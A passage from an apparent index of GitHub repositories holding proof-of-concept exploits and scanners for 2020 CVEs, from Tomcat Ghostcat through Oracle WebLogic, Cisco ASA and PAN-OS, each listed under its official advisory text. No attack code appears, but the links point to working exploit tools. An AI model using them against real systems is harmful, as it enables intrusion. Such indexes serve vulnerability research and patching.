[laolisafe/CVE-2020-1938](https://github.com/laolisafe/CVE-2020-1938) +- [h7hac9/CVE-2020-1938](https://github.com/h7hac9/CVE-2020-1938) +- [sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read](https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read) +- [fairyming/CVE-2020-1938](https://github.com/fairyming/CVE-2020-1938) +- [dacade/CVE-2020-1938](https://github.com/dacade/CVE-2020-1938) +- [woaiqiukui/CVE-2020-1938TomcatAjpScanner](https://github.com/woaiqiukui/CVE-2020-1938TomcatAjpScanner) +- [fatal0/tomcat-cve-2020-1938-check](https://github.com/fatal0/tomcat-cve-2020-1938-check) +- [delsadan/CNVD-2020-10487-Bulk-verification](https://github.com/delsadan/CNVD-2020-10487-Bulk-verification) +- [00theway/Ghostcat-CNVD-2020-10487](https://github.com/00theway/Ghostcat-CNVD-2020-10487) +- [shaunmclernon/ghostcat-verification](https://github.com/shaunmclernon/ghostcat-verification) +- [w4fz5uck5/CVE-2020-1938-Clean-Version](https://github.com/w4fz5uck5/CVE-2020-1938-Clean-Version) +- [whatboxapp/GhostCat-LFI-exp](https://github.com/whatboxapp/GhostCat-LFI-exp) +- [Just1ceP4rtn3r/CVE-2020-1938-Tool](https://github.com/Just1ceP4rtn3r/CVE-2020-1938-Tool) +- [doggycheng/CNVD-2020-10487](https://github.com/doggycheng/CNVD-2020-10487) +- [I-Runtime-Error/CVE-2020-1938](https://github.com/I-Runtime-Error/CVE-2020-1938) +- [Umesh2807/Ghostcat](https://github.com/Umesh2807/Ghostcat) +- [MateoSec/ghostcatch](https://github.com/MateoSec/ghostcatch) +- [acodervic/CVE-2020-1938-MSF-MODULE](https://github.com/acodervic/CVE-2020-1938-MSF-MODULE) +- [Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat](https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat) +- [streghstreek/CVE-2020-1938](https://github.com/streghstreek/CVE-2020-1938) +- [Neko-chanQwQ/CVE-2020-1938](https://github.com/Neko-chanQwQ/CVE-2020-1938) +- [jptr218/ghostcat](https://github.com/jptr218/ghostcat) +- [einzbernnn/CVE-2020-1938Scan](https://github.com/einzbernnn/CVE-2020-1938Scan) +- [YounesTasra-R4z3rSw0rd/CVE-2020-1938](https://github.com/YounesTasra-R4z3rSw0rd/CVE-2020-1938) +- [tpt11fb/AttackTomcat](https://github.com/tpt11fb/AttackTomcat) +- [Warelock/cve-2020-1938](https://github.com/Warelock/cve-2020-1938) +- [WHtig3r/CVE-2020-1938](https://github.com/WHtig3r/CVE-2020-1938) +- [lizhianyuguangming/TomcatScanPro](https://github.com/lizhianyuguangming/TomcatScanPro) +- [aib0litt/poc-CVE-2020-1938](https://github.com/aib0litt/poc-CVE-2020-1938) + +### CVE-2020-1947 (2020-03-11) + +In Apache ShardingSphere(incubator) 4.0.0-RC3 and 4.0.0, the ShardingSphere's web console uses the SnakeYAML library for parsing YAML inputs to load datasource configuration. SnakeYAML allows to unmarshal data to a Java type By using the YAML tag. Unmarshalling untrusted data can lead to security flaws of RCE. + + +- [jas502n/CVE-2020-1947](https://github.com/jas502n/CVE-2020-1947) +- [wsfengfan/CVE-2020-1947](https://github.com/wsfengfan/CVE-2020-1947) +- [shadowsock5/ShardingSphere_CVE-2020-1947](https://github.com/shadowsock5/ShardingSphere_CVE-2020-1947) +- [StarkChristmas/CVE-2020-1947](https://github.com/StarkChristmas/CVE-2020-1947) + +### CVE-2020-1948 (2020-07-14) + +This vulnerability can affect all Dubbo users stay on version 2.7.6 or lower. An attacker can send RPC requests with unrecognized service name or method name along with some malicious parameter payloads. When the malicious parameter is deserialized, it will execute some malicious code. More details can be found below. + + +- [ctlyz123/CVE-2020-1948](https://github.com/ctlyz123/CVE-2020-1948) +- [txrw/Dubbo-CVE-2020-1948](https://github.com/txrw/Dubbo-CVE-2020-1948) +- [M3g4Byt3/cve-2020-1948-poc](https://github.com/M3g4Byt3/cve-2020-1948-poc) +- [L0kiii/Dubbo-deserialization](https://github.com/L0kiii/Dubbo-deserialization) + +### CVE-2020-1956 (2020-05-22) + +Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation. + + +- [b510/CVE-2020-1956](https://github.com/b510/CVE-2020-1956) + +### CVE-2020-1958 (2020-04-01) + +When LDAP authentication is enabled in Apache Druid 0.17.0, callers of Druid APIs with a valid set of LDAP credentials can bypass the credentialsValidator.userSearch filter barrier that determines if a valid LDAP user is allowed to authenticate with Druid. They are still subject to role-based authorization checks, if configured. Callers of Druid APIs can also retrieve any LDAP attribute values of users that exist on the LDAP server, so long as that information is visible to the Druid server. This information disclosure does not require the caller itself to be a valid LDAP user. + + +- [ggolawski/CVE-2020-1958](https://github.com/ggolawski/CVE-2020-1958) + +### CVE-2020-1967 (2020-04-21) + +Server or client applications that call the SSL_check_chain() function during or after a TLS 1.3 handshake may crash due to a NULL pointer dereference as a result of incorrect handling of the "signature_algorithms_cert" TLS extension. The crash occurs if an invalid or unrecognised signature algorithm is received from the peer. This could be exploited by a malicious peer in a Denial of Service attack. OpenSSL version 1.1.1d, 1.1.1e, and 1.1.1f are affected by this issue. This issue did not affect OpenSSL versions prior to 1.1.1d. Fixed in OpenSSL 1.1.1g (Affected 1.1.1d-1.1.1f). + + +- [irsl/CVE-2020-1967](https://github.com/irsl/CVE-2020-1967) + +### CVE-2020-1971 (2020-12-08) + +The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they are equal or not. This function behaves incorrectly when both GENERAL_NAMEs contain an EDIPARTYNAME. A NULL pointer dereference and a crash may occur leading to a possible denial of service attack. OpenSSL itself uses the GENERAL_NAME_cmp function for two purposes: 1) Comparing CRL distribution point names between an available CRL and a CRL distribution point embedded in an X509 certificate 2) When verifying that a timestamp response token signer matches the timestamp authority name (exposed via the API functions TS_RESP_verify_response and TS_RESP_verify_token) If an attacker can control both items being compared then that attacker could trigger a crash. For example if the attacker can trick a client or server into checking a malicious certificate against a malicious CRL then this may occur. Note that some applications automatically download CRLs based on a URL embedded in a certificate. This checking happens prior to the signatures on the certificate and CRL being verified. OpenSSL's s_server, s_client and verify tools have support for the "-crl_download" option which implements automatic CRL downloading and this attack has been demonstrated to work against those tools. Note that an unrelated bug means that affected versions of OpenSSL cannot parse or construct correct encodings of EDIPARTYNAME. However it is possible to construct a malformed EDIPARTYNAME that OpenSSL's parser will accept and hence trigger this attack. All OpenSSL 1.1.1 and 1.0.2 versions are affected by this issue. Other OpenSSL releases are out of support and have not been checked. Fixed in OpenSSL 1.1.1i (Affected 1.1.1-1.1.1h). Fixed in OpenSSL 1.0.2x (Affected 1.0.2-1.0.2w). + + +- [MBHudson/CVE-2020-1971](https://github.com/MBHudson/CVE-2020-1971) + +### CVE-2020-2023 (2020-06-10) + +Kata Containers doesn't restrict containers from accessing the guest's root filesystem device. Malicious containers can exploit this to gain code execution on the guest and masquerade as the kata-agent. This issue affects Kata Containers 1.11 versions earlier than 1.11.1; Kata Containers 1.10 versions earlier than 1.10.5; and Kata Containers 1.9 and earlier versions. + + +- [ssst0n3/kata-cve-2020-2023-poc](https://github.com/ssst0n3/kata-cve-2020-2023-poc) + +### CVE-2020-2034 (2020-07-08) + +An OS Command Injection vulnerability in the PAN-OS GlobalProtect portal allows an unauthenticated network based attacker to execute arbitrary OS commands with root privileges. An attacker requires some knowledge of the firewall to exploit this issue. This issue can not be exploited if GlobalProtect portal feature is not enabled. This issue impacts PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; all versions of PAN-OS 8.0 and PAN-OS 7.1. Prisma Access services are not impacted by this vulnerability. + + +- [blackhatethicalhacking/CVE-2020-2034-POC](https://github.com/blackhatethicalhacking/CVE-2020-2034-POC) + +### CVE-2020-2038 (2020-09-09) + +An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts: PAN-OS 9.0 versions earlier than 9.0.10; PAN-OS 9.1 versions earlier than 9.1.4; PAN-OS 10.0 versions earlier than 10.0.1. + + +- [und3sc0n0c1d0/CVE-2020-2038](https://github.com/und3sc0n0c1d0/CVE-2020-2038) + +### CVE-2020-2333 +- [section-c/CVE-2020-2333](https://github.com/section-c/CVE-2020-2333) + +### CVE-2020-2501 (2021-02-17) + +A stack-based buffer overflow vulnerability has been reported to affect QNAP NAS devices running Surveillance Station. If exploited, this vulnerability allows attackers to execute arbitrary code. QNAP have already fixed this vulnerability in the following versions: Surveillance Station 5.1.5.4.3 (and later) for ARM CPU NAS (64bit OS) and x86 CPU NAS (64bit OS) Surveillance Station 5.1.5.3.3 (and later) for ARM CPU NAS (32bit OS) and x86 CPU NAS (32bit OS) + + +- [Alonzozzz/alonzzzo](https://github.com/Alonzozzz/alonzzzo) + +### CVE-2020-2509 (2021-04-17) + +A command injection vulnerability has been reported to affect QTS and QuTS hero. If exploited, this vulnerability allows attackers to execute arbitrary commands in a compromised application. We have already fixed this vulnerability in the following versions: QTS 4.5.2.1566 Build 20210202 and later QTS 4.5.1.1495 Build 20201123 and later QTS 4.3.6.1620 Build 20210322 and later QTS 4.3.4.1632 Build 20210324 and later QTS 4.3.3.1624 Build 20210416 and later QTS 4.2.6 Build 20210327 and later QuTS hero h4.5.1.1491 build 20201119 and later + + +- [jbaines-r7/overkill](https://github.com/jbaines-r7/overkill) + +### CVE-2020-2546 (2020-01-15) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Application Container - JavaEE). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [hktalent/CVE_2020_2546](https://github.com/hktalent/CVE_2020_2546) + +### CVE-2020-2551 (2020-01-15) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: WLS Core Components). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [0xn0ne/weblogicScanner](https://github.com/0xn0ne/weblogicScanner) +- [jas502n/CVE-2020-2551](https://github.com/jas502n/CVE-2020-2551) +- [hktalent/CVE-2020-2551](https://github.com/hktalent/CVE-2020-2551) +- [Y4er/CVE-2020-2551](https://github.com/Y4er/CVE-2020-2551) +- [zzwlpx/weblogicPoc](https://github.com/zzwlpx/weblogicPoc) +- [Dido1960/Weblogic-CVE-2020-2551-To-Internet](https://github.com/Dido1960/Weblogic-CVE-2020-2551-To-Internet) +- [DaMinGshidashi/CVE-2020-2551](https://github.com/DaMinGshidashi/CVE-2020-2551) +- [LTiDi2000/CVE-2020-2551](https://github.com/LTiDi2000/CVE-2020-2551) +- [0xAbbarhSF/CVE-Exploit](https://github.com/0xAbbarhSF/CVE-Exploit) + +### CVE-2020-2555 (2020-01-15) + +Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence. Successful attacks of this vulnerability can result in takeover of Oracle Coherence. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [Hu3sky/CVE-2020-2555](https://github.com/Hu3sky/CVE-2020-2555) +- [wsfengfan/CVE-2020-2555](https://github.com/wsfengfan/CVE-2020-2555) +- [Y4er/CVE-2020-2555](https://github.com/Y4er/CVE-2020-2555) +- [Maskhe/cve-2020-2555](https://github.com/Maskhe/cve-2020-2555) +- [Uvemode/CVE-2020-2555](https://github.com/Uvemode/CVE-2020-2555) +- [Qynklee/POC_CVE-2020-2555](https://github.com/Qynklee/POC_CVE-2020-2555) + +### CVE-2020-2655 (2020-01-15) + +Vulnerability in the Java SE product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 11.0.5 and 13.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE accessible data as well as unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N). + + +- [RUB-NDS/CVE-2020-2655-DemoServer](https://github.com/RUB-NDS/CVE-2020-2655-DemoServer) + +### CVE-2020-2733 (2020-04-15) + +Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Monitoring and Diagnostics). The supported version that is affected is 9.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in takeover of JD Edwards EnterpriseOne Tools. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [anmolksachan/CVE-2020-2733](https://github.com/anmolksachan/CVE-2020-2733) + +### CVE-2020-2883 (2020-04-15) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [Y4er/CVE-2020-2883](https://github.com/Y4er/CVE-2020-2883) +- [MagicZer0/Weblogic_CVE-2020-2883_POC](https://github.com/MagicZer0/Weblogic_CVE-2020-2883_POC) +- [ZZZWD/CVE-2020-2883](https://github.com/ZZZWD/CVE-2020-2883) +- [Y4er/WebLogic-Shiro-shell](https://github.com/Y4er/WebLogic-Shiro-shell) +- [FancyDoesSecurity/CVE-2020-2883](https://github.com/FancyDoesSecurity/CVE-2020-2883) +- [Al1ex/CVE-2020-2883](https://github.com/Al1ex/CVE-2020-2883) +- [Qynklee/POC_CVE-2020-2883](https://github.com/Qynklee/POC_CVE-2020-2883) + +### CVE-2020-2950 (2020-04-15) + +Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web General). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in takeover of Oracle Business Intelligence Enterprise Edition. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [tuo4n8/CVE-2020-2950](https://github.com/tuo4n8/CVE-2020-2950) + +### CVE-2020-2969 (2020-07-15) + +Vulnerability in the Data Pump component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Data Pump. Successful attacks of this vulnerability can result in takeover of Data Pump. CVSS 3.1 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H). + + +- [emad-almousa/CVE-2020-2969](https://github.com/emad-almousa/CVE-2020-2969) + +### CVE-2020-2978 (2020-07-15) + +Vulnerability in the Oracle Database - Enterprise Edition component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Oracle Database - Enterprise Edition. While the vulnerability is in Oracle Database - Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Database - Enterprise Edition accessible data. CVSS 3.1 Base Score 4.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N). + + +- [emad-almousa/CVE-2020-2978](https://github.com/emad-almousa/CVE-2020-2978) + +### CVE-2020-3153 (2020-02-19) + +A vulnerability in the installer component of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated local attacker to copy user-supplied files to system level directories with system level privileges. The vulnerability is due to the incorrect handling of directory paths. An attacker could exploit this vulnerability by creating a malicious file and copying the file to a system directory. An exploit could allow the attacker to copy malicious files to arbitrary locations with system level privileges. This could include DLL pre-loading, DLL hijacking, and other related attacks. To exploit this vulnerability, the attacker needs valid credentials on the Windows system. + + +- [shubham0d/CVE-2020-3153](https://github.com/shubham0d/CVE-2020-3153) +- [raspberry-pie/CVE-2020-3153](https://github.com/raspberry-pie/CVE-2020-3153) +- [goichot/CVE-2020-3153](https://github.com/goichot/CVE-2020-3153) + +### CVE-2020-3161 (2020-04-15) + +A vulnerability in the web server for Cisco IP Phones could allow an unauthenticated, remote attacker to execute code with root privileges or cause a reload of an affected IP phone, resulting in a denial of service (DoS) condition. The vulnerability is due to a lack of proper input validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web server of a targeted device. A successful exploit could allow the attacker to remotely execute code with root privileges or cause a reload of an affected IP phone, resulting in a DoS condition. + + +- [abood05972/CVE-2020-3161](https://github.com/abood05972/CVE-2020-3161) + +### CVE-2020-3187 (2020-05-06) + +A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences. An exploit could allow the attacker to view or delete arbitrary files on the targeted system. When the device is reloaded after exploitation of this vulnerability, any files that were deleted are restored. The attacker can only view and delete files within the web services file system. This file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability can not be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. Reloading the affected device will restore all files within the web services file system. + + +- [CrackerCat/CVE-2020-3187](https://github.com/CrackerCat/CVE-2020-3187) +- [1337in/CVE-2020-3187](https://github.com/1337in/CVE-2020-3187) +- [sujaygr8/CVE-2020-3187](https://github.com/sujaygr8/CVE-2020-3187) +- [sunyyer/CVE-2020-3187-Scanlist](https://github.com/sunyyer/CVE-2020-3187-Scanlist) +- [Cappricio-Securities/CVE-2020-3187](https://github.com/Cappricio-Securities/CVE-2020-3187) + +### CVE-2020-3433 (2020-08-17) + +A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL hijacking attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system. The vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system. + + +- [goichot/CVE-2020-3433](https://github.com/goichot/CVE-2020-3433) + +### CVE-2020-3452 (2020-07-22) + +A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. + + +- [XDev05/CVE-2020-3452-PoC](https://github.com/XDev05/CVE-2020-3452-PoC) +- [Loneyers/cve-2020-3452](https://github.com/Loneyers/cve-2020-3452) +- [PR3R00T/CVE-2020-3452-Cisco-Scanner](https://github.com/PR3R00T/CVE-2020-3452-Cisco-Scanner) +- [mr-r3b00t/CVE-2020-3452](https://github.com/mr-r3b00t/CVE-2020-3452) +- [foulenzer/CVE-2020-3452](https://github.com/foulenzer/CVE-2020-3452) +- [Gh0st0ne/http-vuln-cve2020-3452.nse](https://github.com/Gh0st0ne/http-vuln-cve2020-3452.nse) +- [0x5ECF4ULT/CVE-2020-3452](https://github.com/0x5ECF4ULT/CVE-2020-3452) +- [paran0id34/CVE-2020-3452](https://github.com/paran0id34/CVE-2020-3452) +- [murataydemir/CVE-2020-3452](https://github.com/murataydemir/CVE-2020-3452) +- [ludy-dev/Cisco-ASA-LFI](https://github.com/ludy-dev/Cisco-ASA-LFI) +- [3ndG4me/CVE-2020-3452-Exploit](https://github.com/3ndG4me/CVE-2020-3452-Exploit) +- [grim3/CVE-2020-3452](https://github.com/grim3/CVE-2020-3452) +- [cygenta/CVE-2020-3452](https://github.com/cygenta/CVE-2020-3452) +- [darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter](https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter) +- [fuzzlove/Cisco-ASA-FTD-Web-Services-Traversal](https://github.com/fuzzlove/Cisco-ASA-FTD-Web-Services-Traversal) +- [faisalfs10x/Cisco-CVE-2020-3452-shodan-scanner](https://github.com/faisalfs10x/Cisco-CVE-2020-3452-shodan-scanner) +- [sujaygr8/CVE-2020-3452](https://github.com/sujaygr8/CVE-2020-3452) +- [Aviksaikat/CVE-2020-3452](https://github.com/Aviksaikat/CVE-2020-3452) +- [Veids/CVE-2020-3452_auto](https://github.com/Veids/CVE-2020-3452_auto) +- [iveresk/cve-2020-3452](https://github.com/iveresk/cve-2020-3452) +- [Cappricio-Securities/CVE-2020-3452](https://github.com/Cappricio-Securities/CVE-2020-3452) + +### CVE-2020-3580 (2020-10-21) + +Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. + + +- [Hudi233/CVE-2020-3580](https://github.com/Hudi233/CVE-2020-3580) +- [adarshvs/CVE-2020-3580](https://github.com/adarshvs/CVE-2020-3580) +- [cruxN3T/CVE-2020-3580](https://github.com/cruxN3T/CVE-2020-3580) +- [catatonicprime/CVE-2020-3580](https://github.com/catatonicprime/CVE-2020-3580) + +### CVE-2020-3766 (2020-03-25) + +Adobe Genuine Integrity Service versions Version 6.4 and earlier have an insecure file permissions vulnerability. Successful exploitation could lead to privilege escalation. + + +- [hessandrew/CVE-2020-3766_APSB20-12](https://github.com/hessandrew/CVE-2020-3766_APSB20-12) + +### CVE-2020-3952 (2020-04-10) + +Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls. + + +- [chronoloper/CVE-2020-3952](https://github.com/chronoloper/CVE-2020-3952) +- [bb33bb/CVE-2020-3952](https://github.com/bb33bb/CVE-2020-3952) +- [guardicore/vmware_vcenter_cve_2020_3952](https://github.com/guardicore/vmware_vcenter_cve_2020_3952) +- [gelim/CVE-2020-3952](https://github.com/gelim/CVE-2020-3952) +- [Fa1c0n35/vmware_vcenter_cve_2020_3952](https://github.com/Fa1c0n35/vmware_vcenter_cve_2020_3952) + +### CVE-2020-3956 (2020-05-20) + +VMware Cloud Director 10.0.x before 10.0.0.2, 9.7.0.x before 9.7.0.5, 9.5.0.x before 9.5.0.6, and 9.1.0.x before 9.1.0.4 do not properly handle input leading to a code injection vulnerability. An authenticated actor may be able to send malicious traffic to VMware Cloud Director which may lead to arbitrary remote code execution. This vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access. + + +- [aaronsvk/CVE-2020-3956](https://github.com/aaronsvk/CVE-2020-3956) + +### CVE-2020-3992 (2020-10-20) + +OpenSLP as used in VMware ESXi (7.0 before ESXi_7.0.1-0.0.16850804, 6.7 before ESXi670-202010401-SG, 6.5 before ESXi650-202010401-SG) has a use-after-free issue. A malicious actor residing in the management network who has access to port 427 on an ESXi machine may be able to trigger a use-after-free in the OpenSLP service resulting in remote code execution. + + +- [HynekPetrak/CVE-2019-5544_CVE-2020-3992](https://github.com/HynekPetrak/CVE-2019-5544_CVE-2020-3992) +- [dgh05t/VMware_ESXI_OpenSLP_PoCs](https://github.com/dgh05t/VMware_ESXI_OpenSLP_PoCs) + +### CVE-2020-4040 (2020-06-08) + +Bolt CMS before version 3.7.1 lacked CSRF protection in the preview generating endpoint. Previews are intended to be generated by the admins, developers, chief-editors, and editors, who are authorized to create content in the application. But due to lack of proper CSRF protection, unauthorized users could generate a preview. This has been fixed in Bolt 3.7.1 + + +- [jpvispo/RCE-Exploit-Bolt-3.7.0-CVE-2020-4040-4041](https://github.com/jpvispo/RCE-Exploit-Bolt-3.7.0-CVE-2020-4040-4041) + +### CVE-2020-4276 (2020-03-26) + +IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 traditional is vulnerable to a privilege escalation vulnerability when using token-based authentication in an admin request over the SOAP connector. X-Force ID: 175984. + + +- [mekoko/CVE-2020-4276](https://github.com/mekoko/CVE-2020-4276) + +### CVE-2020-4463 (2020-07-29) + +IBM Maximo Asset Management 7.6.0.1 and 7.6.0.2 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 181484. + + +- [Ibonok/CVE-2020-4463](https://github.com/Ibonok/CVE-2020-4463) + +### CVE-2020-4464 (2020-07-17) + +IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 traditional could allow a remote attacker to execute arbitrary code on a system with a specially-crafted sequence of serialized objects over the SOAP connector. IBM X-Force ID: 181489. + + +- [silentsignal/WebSphere-WSIF-gadget](https://github.com/silentsignal/WebSphere-WSIF-gadget) +- [yonggui-li/CVE-2020-4464-and-CVE-2020-4450](https://github.com/yonggui-li/CVE-2020-4464-and-CVE-2020-4450) + +### CVE-2020-5014 (2021-03-08) + +IBM DataPower Gateway V10 and V2018 could allow a local attacker with administrative privileges to execute arbitrary code on the system using a server-side requesr forgery attack. IBM X-Force ID: 193247. + + +- [copethomas/datapower-redis-rce-exploit](https://github.com/copethomas/datapower-redis-rce-exploit) + +### CVE-2020-5236 (2020-02-04) + +Waitress version 1.4.2 allows a DOS attack When waitress receives a header that contains invalid characters. When a header like "Bad-header: xxxxxxxxxxxxxxx\x10" is received, it will cause the regular expression engine to catastrophically backtrack causing the process to use 100% CPU time and blocking any other interactions. This allows an attacker to send a single request with an invalid header and take the service offline. This issue was introduced in version 1.4.2 when the regular expression was updated to attempt to match the behaviour required by errata associated with RFC7230. The regular expression that is used to validate incoming headers has been updated in version 1.4.3, it is recommended that people upgrade to the new version of Waitress as soon as possible. + + +- [motikan2010/CVE-2020-5236](https://github.com/motikan2010/CVE-2020-5236) + +### CVE-2020-5245 (2020-02-24) + +Dropwizard-Validation before 1.3.19, and 2.0.2 may allow arbitrary code execution on the host system, with the privileges of the Dropwizard service account, by injecting arbitrary Java Expression Language expressions when using the self-validating feature.\n\nThe issue has been fixed in dropwizard-validation 1.3.19 and 2.0.2. + + +- [LycsHub/CVE-2020-5245](https://github.com/LycsHub/CVE-2020-5245) + +### CVE-2020-5248 (2020-05-12) + +GLPI before before version 9.4.6 has a vulnerability involving a default encryption key. GLPIKEY is public and is used on every instance. This means anyone can decrypt sensitive data stored using this key. It is possible to change the key before installing GLPI. But on existing instances, data must be reencrypted with the new key. Problem is we can not know which columns or rows in the database are using that; espcially from plugins. Changing the key without updating data would lend in bad password sent from glpi; but storing them again from the UI will work. + + +- [indevi0us/CVE-2020-5248](https://github.com/indevi0us/CVE-2020-5248) +- [Mkway/CVE-2020-5248](https://github.com/Mkway/CVE-2020-5248) + +### CVE-2020-5250 (2020-03-05) + +In PrestaShop before version 1.7.6.4, when a customer edits 